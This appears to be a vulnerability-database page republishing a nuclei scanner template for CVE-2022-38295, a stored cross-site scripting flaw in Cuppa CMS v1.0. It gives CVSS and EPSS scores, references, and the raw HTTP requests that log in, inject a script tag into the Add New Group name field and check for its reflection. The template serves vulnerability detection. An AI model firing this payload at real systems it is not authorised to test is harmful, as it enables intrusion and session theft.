Lucene search
K

Cuppa CMS v1.0 - Cross Site Scripting

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 40 Views

Cuppa CMS v1.0 contains a cross-site scripting vulnerability allowing attackers to execute arbitrary web scripts via crafted payload in the Name field

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-38295
12 Sep 202221:15
attackerkb
Circl
CVE-2022-38295
13 Sep 202200:24
circl
CNNVD
CuppaCMS 跨站脚本漏洞
12 Sep 202200:00
cnnvd
CVE
CVE-2022-38295
12 Sep 202220:43
cve
Cvelist
CVE-2022-38295
12 Sep 202220:43
cvelist
NVD
CVE-2022-38295
12 Sep 202221:15
nvd
OSV
CVE-2022-38295
12 Sep 202221:15
osv
Prion
Cross site scripting
12 Sep 202221:15
prion
Positive Technologies
PT-2022-24345 · Cuppacms · Cuppacms
12 Sep 202200:00
ptsecurity
RedhatCVE
CVE-2022-38295
9 Jan 202610:57
redhatcve
Rows per page
id: CVE-2022-38295

info:
  name: Cuppa CMS v1.0 - Cross Site Scripting
  author: theamanrawat
  severity: medium
  description: |
    Cuppa CMS v1.0 was discovered to contain a cross-site scripting vulnerability at /table_manager/view/cu_user_groups. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field under the Add New Group function.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    To remediate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
  reference:
    - https://github.com/CuppaCMS/CuppaCMS
    - https://nvd.nist.gov/vuln/detail/CVE-2022-38295
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-38295
    cwe-id: CWE-79
    epss-score: 0.01048
    epss-percentile: 0.60071
    cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: cuppacms
    product: cuppacms
  tags: cve2022,cve,xss,cuppa,authenticated,cuppacms,vuln

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user={{username}}&password={{password}}&language=en&task=login
      - |
        POST /components/table_manager/classes/functions.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        id_field=0&name_field="><script>alert(document.domain)</script>&admin_login_field=1&site_login_field=1&enabled_field=1&view=cu_user_groups&function=saveAdminTable
      - |
        POST /components/table_manager/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        path=component%2Ftable_manager%2Fview%2Fcu_user_groups&uniqueClass=

    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - '"><script>alert(document.domain)</script>'
          - 'cuppa_html'
        condition: and

      - type: word
        part: header_3
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a00463044022005cd47ebdaaf347970d1c146954b5382adde073437e9057af1d9f15db3f51b20022012193b1a5e4770153749a35d5f741a2dcb2c32586f1f7ab8da2dd7978938c954:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 3.16.1
EPSS0.01048
40